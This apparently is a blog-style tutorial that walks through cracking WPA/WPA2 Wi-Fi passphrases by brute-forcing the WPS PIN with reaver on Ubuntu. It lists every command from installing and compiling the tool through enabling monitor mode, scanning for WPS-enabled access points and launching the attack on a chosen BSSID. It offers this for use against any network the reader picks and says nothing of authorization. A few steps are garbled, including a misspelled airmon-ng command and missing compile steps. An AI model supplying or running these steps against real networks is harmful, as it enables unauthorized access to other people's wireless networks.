WPA or even WPA2 can be easily cracked under 10 hours provided that WPS is enabled on the router. The software we'll use is reaver.
The hardware I'm using is Intel(R) PRO/Wireless 3945ABG/BG on Ubuntu 11.04 and driver is iwl3945.
First install the necessary libraries to compile the software. Run the following command in terminal to do so.
sudo apt-get install libsqlite3-dev libpcap0.8-dev build-essential
Now open terminal and go inside /tmp folder.
Download reaver from here by running the command wget -c http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=
Now extract it by running tar xf reaver-1.4.tar.gz
Now run the following commands to compile the software.
sudo make install
After this reaver will be installed on your system.
Now let's install aircrack-ng(Optional). We'll not be using aircrack directly but use its tool to assist our cracking. You can install it by running:
sudo apt-get install aircrack-ng
Now comes the attacking part.
First of all we have to enable monitor mode on our wireless interface. To do so run sudo airomon-ng start wlan0 . This will create a new interface mon0 (ath0 in other drivers) with monitor mode enabled.
You can also use ifconfig command to bring the interface in monitor mode. Aircrack-ng will not be required in this way.
Now let's check if the AP has WPS support. Run the command sudo wash -i mon0 --ignore-fcs
If the AP doesn't support WPS it won't be listed here. If its listed then the AP supports WPS and can be cracked. Just note the channel and BSSID of the AP you want.
Now lets run reaver command. sudo reaver -i mon0 -b bssid-you-noted-above -vv -c channel-you-noted-above --no-nacks
Now the software will start brute forcing the PIN and will generate the WPA/WPA2 PSK in less than 10 hours.